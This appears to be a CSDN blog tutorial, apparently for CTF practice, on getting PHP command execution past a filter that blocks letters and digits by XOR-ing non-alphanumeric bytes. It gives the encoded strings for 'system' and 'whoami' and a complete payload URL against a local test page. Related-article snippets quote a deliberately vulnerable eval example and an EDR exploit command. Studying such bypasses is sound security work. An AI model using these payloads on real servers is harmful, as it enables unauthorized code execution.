RCE无字母数字绕过正则表达式基础

最新推荐文章于 2024-08-23 15:54:50 发布
最新推荐文章于 2024-08-23 15:54:50 发布
阅读量192 收藏
点赞数 2
文章标签: java 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62903168/article/details/141337621
版权

这串代码过滤了字母和数字。

php可以通过两个字符异或拼接出字母,这样就可以实现命令执行了。

写一段脚本看看哪些字符异或可以得到常见字母。

运行之后就得到了这些结果,我们只需要去找其中所需字母何其对应的url码。

var_dump(urldecode("%08%02%08%08%05%0d") ^ urldecode("%7b%7b%7b%7c%60%60"));

var_dump(urldecode("%08%08%0f%01%0d%09") ^ urldecode("%7f%60%60%60%60%60"));

现在只需要把其写进code中就行了。

http://127.0.0.1/web5.php?code=(%22%08%02%08%08%05%0d%22^%22%7b%7b%7b%7c%60%60%22)(%22%08%08%0f%01%0d%09%22^%22%7f%60%60%60%60%60%22);

槐序深巷里打雨伞的人
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
异或脚本rce题目绕过正则表达式必备
12-28
字符串转换成异或型,用于rce绕过正则表达式
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
然而,这种防护策略可以通过巧妙的编码转换和利用其他非字母数字字符来绕过。 首先,要理解无字母数字Webshell的核心思想。如描述中提到的示例代码,它限制了`shell`参数中不能含有字母数字。但只要我们能找到...
字母数字绕过正则表达式
ningwangh的博客
08-12 468
我们下面以命令。
RCE-无字母数字绕过正则表达式
2301_78549931的博客
08-13 995
我们可以通过一些不可见字符进行异或运算得到我们的字母(例如s=urldecode(%08)^urldecode(%7b)),这样是不是就绕过了waf。所以我们只需使用上述方法构造出system("ipconfig"),便可以执行命令,这里可以编写一个简单的php脚本来获取。根据源码,我们发现它过滤字母数字大小写,所以我们要想实现代码执行,得另想方法构造代码执行。接下来我们可以使用py脚本来获取我们想要构造的payload:、取反的话,基本上用的都是一个不可见字符,所有不会触发到。
字母数字绕过正则表达式--上传临时文件、异或、或、取反、自增
unexpectedthing的博客
09-10 1046
文章目录 借用羽神的文章,转发是为了自己后面方便看 https://blog.csdn.net/miuzzx/article/details/108569080?spm=1001.2014.3001.5501
字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)
热门推荐
羽的博客
10-18 1万+
题目例子 <?php error_reporting(0); highlight_file(__FILE__); $code=$_GET['code']; if(preg_match('/[a-z0-9]/i',$code)){ die('hacker'); } eval($code); 我们下面以命令system('ls')为例 一、异或 <?php /*author yu22x*/ $myfile = fopen("xor_rce.txt", "w"); $contents="
无参数 rce.md
04-01
记录一下,关于这次比赛的 wp >.< 并向大佬们积极学习 >.< 顺便混点分
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
开发多线程程序时,需要注意那些问题
最新发布
OO_SEN的博客
08-23 539
线程安全 竞态条件(Race Condition):当多个线程同时访问和修改共享资源时,可能会出现竞态条件,导致不确定的行为。需要通过同步机制(如互斥锁、读写锁、原子操作)来保护共享资源。 死锁(Deadlock):当两个或多个线程相互等待对方释放锁时,程序会陷入死锁状态。避免死锁的一些策略包括:避免嵌套锁、确保加锁顺序一致、使用超时机制等。 活锁(Livelock):与死锁不同,活锁是指线程不断地尝试获取资源但总是失败,导致无法继续执行。避免频繁重试操作或使用退避算法可以减少活锁的发生。 优先级反转(P
Yolov8:模型部署到安卓端
m0_70694811的博客
08-21 778
下载安装jdk-8u202-windows-x64.exe,这篇文章有百度网盘资源链接,直接下载,并按照这篇文章的JDK步骤进行安装和环境变量配置。C:\Program Files\Java\jdk-1.8\bin和C:\Program Files\Java\jdk-1.8\jre\bin。比如因为我的jdk路径是C:\Program Files\Java\jdk-1.8,所以这两个相对路径就改成。参考这边文章的USB驱动设置和手机端设置。同意协议后,下载相应版本的JDK。
笔记redis
风止的博客
08-22 1049
Redis(Remote Dictionary Server)是用C语言开发的一个基于的数据库。
@Transactional中使用线程锁导致了锁失效与解决方案
liuruiaaa的博客
08-23 742
@Transactional中使用线程锁导致了锁失效与解决方案
JavaScript 错误 - Throw 和 Try to Catch的使用
逆风优雅的博客
08-23 150
trycatchthrow上面的代码 因为 try中 没有adddlert这个方法,或者这个方法有误,这时,代码会执行catch部分JavaScript 实际上会创建带有两个属性的Error 对象name和message。
使用Java通过身份证号码匹配省市县名称的技术博客
weixin_41489908的博客
08-21 347
每日自动更新各类学习教程及工具下载合集​​在中国,身份证号码包含了持有人的出生地信息。通过解析身份证号码的前六位,我们可以获取对应的省、市、县(区)信息。在这篇博客中,我们将探讨如何使用Java代码来实现这一功能,并展示详细的代码示例和运行结果。
Java中自定义注解的使用
echola_mendes的博客
08-22 996
以【记录操作日志】为例,一般在开发中为了记录用户操作,当系统出现问题时,可以追溯日志所提供详细的错误信息,帮助开发者快速定位问题的原因最简单的方法:在每个方法中增加日志信息打印代码,来记录操作日志,但是这样重复代码也很多,也不易扩展,而且易出错使用自定义注解就会方便很多,减少不必要的重复代码,减少非业务代码的侵入性,如果需要扩展操作用户的信息以及IP就会很方便,易于扩展和维护@interface在需要使用自定义注解的地方使用该注解@LogOperation("新增")// 方法实现。
JavaSE 集合
ALLWE的博客
08-20 683
调用空构造器时初始化 Object[] elementData 数组,长度为10;初始化 size 属性,值为0;当elementData 数组中的10个位置都有元素后,添加第11个元素时数组扩容;扩容长度为原数组的1.5倍;扩容逻辑是创建一个长度为 15 的数组,将旧数组的数据拷贝到新数组中。
如何用Java SpringBoot+Vue搭建校内跑腿业务系统?实战教程解析
WEIXIN_JSJBCZDS的博客
08-21 983
如何用Java SpringBoot+Vue搭建校内跑腿业务系统?实战教程解析 【毕设攻略】Java SpringBoot+Vue打造校内跑腿系统!从零开始,手把手教你构建完整的业务流程。实战教程,技术难点全解析,让你的毕设项目脱颖而出,校园创业从这里启航!点击视频,开启你的编程之旅!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值